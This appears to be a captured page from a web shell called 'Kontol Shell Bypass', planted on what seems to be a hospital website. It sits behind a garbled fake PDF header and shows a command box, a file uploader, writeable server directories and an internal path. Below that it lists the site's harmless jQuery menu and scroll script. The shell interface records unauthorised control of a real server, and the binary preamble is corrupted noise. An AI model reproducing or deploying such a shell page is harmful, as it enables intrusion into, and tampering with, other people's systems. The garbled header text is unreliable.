%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/html/shardahospital_old.org/assets/js/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/shardahospital_old.org/assets/js/custom.js
/*global jQuery:false */
//jQuery(document).ready(function ($) {
//    "use strict";
//
//    //add some elements with animate effect
//    $(".box").hover(
//            function () {
//                $(this).find('span.badge').addClass("animated fadeInLeft");
//                $(this).find('.ico').addClass("animated fadeIn");
//            },
//            function () {
//                $(this).find('span.badge').removeClass("animated fadeInLeft");
//                $(this).find('.ico').removeClass("animated fadeIn");
//            }
//    );
//
//    (function () {
//
//        var $menu = $('.navigation nav'),
//                optionsList = '<option value="" selected>Go to..</option>';
//
//        $menu.find('li').each(function () {
//            var $this = $(this),
//                    $anchor = $this.children('a'),
//                    depth = $this.parents('ul').length - 1,
//                    indent = '';
//
//            if (depth) {
//                while (depth > 0) {
//                    indent += ' - ';
//                    depth--;
//                }
//
//            }
//            $(".nav li").parent().addClass("bold");
//
//            optionsList += '<option value="' + $anchor.attr('href') + '">' + indent + ' ' + $anchor.text() + '</option>';
//        }).end()
//                .after('<select class="selectmenu">' + optionsList + '</select>');
//
//        $('select.selectmenu').on('change', function () {
//            window.location = $(this).val();
//        });
//
//    })();
//
//    //Navi hover
//    $('ul.nav li.dropdown').hover(function () {
//        $(this).find('.dropdown-menu').stop(true, true).delay(200).fadeIn();
//    }, function () {
//        $(this).find('.dropdown-menu').stop(true, true).delay(200).fadeOut();
//    });
//
//});


//****** MEDIA-LIBRARY PAGE AND GALLERY PAGE********
$('ul.simplefilter li').click(function(){
    $('ul.simplefilter').find('li.active').removeClass('active');
    $(this).addClass('active');
})


//************START SCROLL BUTTON******************************
$(document).ready(function () {
    //Check to see if the window is top if not then display button
    $(window).scroll(function () {
        if ($(this).scrollTop() > 200) {
            $('.scrollUp').fadeIn();
        } else {
            $('.scrollUp').fadeOut();
        }
    });

    //Click event to scroll to top
    $('.scrollUp').click(function () {
        $('html, body').animate({scrollTop: 0}, 1000);
        return false;
    });
});


//*********START FOR MENU************************
$('.findDr,.makeApp,.getEnq,.searchHere').hide();
$('.findDr').hide();
$('.boxmenu ul li a.onefinddr').click(function () {    
    var valu = $('.findDr').css('display');   
    if(valu == 'block'){
        $('a.onefinddr').css({'background':'none'});
        $('.findDr').slideUp();
    }
    if(valu == 'none'){
        $('a.onefinddr').css({'background':'#f47436'});
        $('a.twoMakeApp').css({'background':'none'});
        $('a.threeGetEnq').css({'background':'none'});
        $('a.forSearHer').css({'background':'none'});
        $('.makeApp').slideUp();
        $('.getEnq').slideUp();
        $('.searchHere').slideUp();
        $('.findDr').slideDown();
    }
});
$('.boxmenu ul li a.twoMakeApp').click(function () {
    var valu = $('.makeApp').css('display');     
    if(valu == 'block'){
        $('a.twoMakeApp').css({'background':'none'});
        $('.makeApp').slideUp();
    }
    if(valu == 'none'){
        $('a.twoMakeApp').css({'background':'#f47436'});
        $('a.onefinddr').css({'background':'none'});
        $('a.threeGetEnq').css({'background':'none'});
        $('a.forSearHer').css({'background':'none'});
        $('.findDr').slideUp();
        $('.getEnq').slideUp();
        $('.searchHere').slideUp();
        $('.makeApp').slideDown();
    }
});
$('.boxmenu ul li a.threeGetEnq').click(function () {    
    var valu = $('.getEnq').css('display');   
    if(valu == 'block'){
        $('a.threeGetEnq').css({'background':'none'});
        $('.getEnq').slideUp();
    }
    if(valu == 'none'){
        $('a.threeGetEnq').css({'background':'#f47436'});
        $('a.twoMakeApp').css({'background':'none'});
        $('a.onefinddr').css({'background':'none'});
        $('a.forSearHer').css({'background':'none'});
        $('.findDr').slideUp();
        $('.makeApp').slideUp();
        $('.searchHere').slideUp();
        $('.getEnq').slideDown();
    }
});
$('.boxmenu ul li a.forSearHer').click(function () {    
    var valu = $('.searchHere').css('display');   
    if(valu == 'block'){
        $('a.forSearHer').css({'background':'none'});
        $('.searchHere').slideUp();
    }
    if(valu == 'none'){
        $('a.forSearHer').css({'background':'#f47436'});
        $('a.threeGetEnq').css({'background':'none'});
        $('a.twoMakeApp').css({'background':'none'});
        $('a.onefinddr').css({'background':'none'});
        $('.findDr').slideUp();
        $('.getEnq').slideUp();
        $('.makeApp').slideUp();
        $('.searchHere').slideDown();
    }
});
//***********************


//*******MENU************
function myFunction(x){
    x.classList.toggle("change");
    $('.navigation').slideToggle();
}
$(document).ready(function () {
//    //responsive menu toggle
//    $("#menutoggle").click(function () {
//        $('.xs-menu').toggleClass('displaynone');
//    });
//    //add active class on menu
//    $('.mega-menu ul li').click(function (e) {
//        e.preventDefault();
//        $('.mega-menu li').removeClass('active');        
//        $(this).addClass('active');
//    });   
//drop down menu	
    $(".drop-down").hover(function () {
        $(this).find('.mega-menu').addClass('display-on');
    });
    $(".drop-down").mouseleave(function () {
        $(this).find('.mega-menu').removeClass('display-on');
    });

});


//********SECENT MENU***********
var winWidth = $(window).width();

$('.secendmnubtn').click(function() {
        $('.singalMnubar').slideToggle("fast");
});
    
//$('.secendmnubtn').click(function(){
//    var checkbtn = $(this + ' +.singalMnubar').css('display');
//    alert(1);
//    if(checkbtn == 'none'){
//        $(this + ' +.singalMnubar').slideDown(500);
//    }
//    if(checkbtn == 'none'){
//        $(this + ' +.singalMnubar').slideUp(500);
//    }        
//})    




//******* AFTER SCROLL MENU*************
//$(window).scroll(function(){
//    var scrllValu = $(window).scrollTop();
//    if(scrllValu > 300){       
//        $('header').addClass('fixScroll')('slow');
//        //$('header.fixScroll').css({'top':'0'});
//        $('header.fixScroll .container').fadeOut(800);
//        
//        $('header.fixScroll >.topPart > .common > .menupart .boxmenu ul li').mouseover(function(){
//            $(this).find('span.show').css({'display':'none'});
//            $(this).find('svg').css({'display':'block'});
//        })
//        $('header.fixScroll >.topPart > .common > .menupart .boxmenu ul li').mouseleave(function(){
//            $(this).find('span.show').css({'display':'block'});
//            $(this).find('svg').css({'display':'none'});
//        })
//        //$('header').css({'position':'fixed','background':'#fff','z-index':'999'});
//        //$('.topPart .common').css({'width':'100%'});
//    }
//    
//    if(scrllValu < 300){
//        $('header').removeClass('fixScroll');
//        
//        $('header.fixScroll >.topPart > .common > .menupart .boxmenu ul li').find('span.show').css({'display':'block'});
//        $('header.fixScroll >.topPart > .common > .menupart .boxmenu ul li').find('svg').css({'display':'block'});
//    }
//})

$("#close-appointment").click(function(){
									$(".makeApp.sameMnuBox").hide;
								});


Kontol Shell Bypass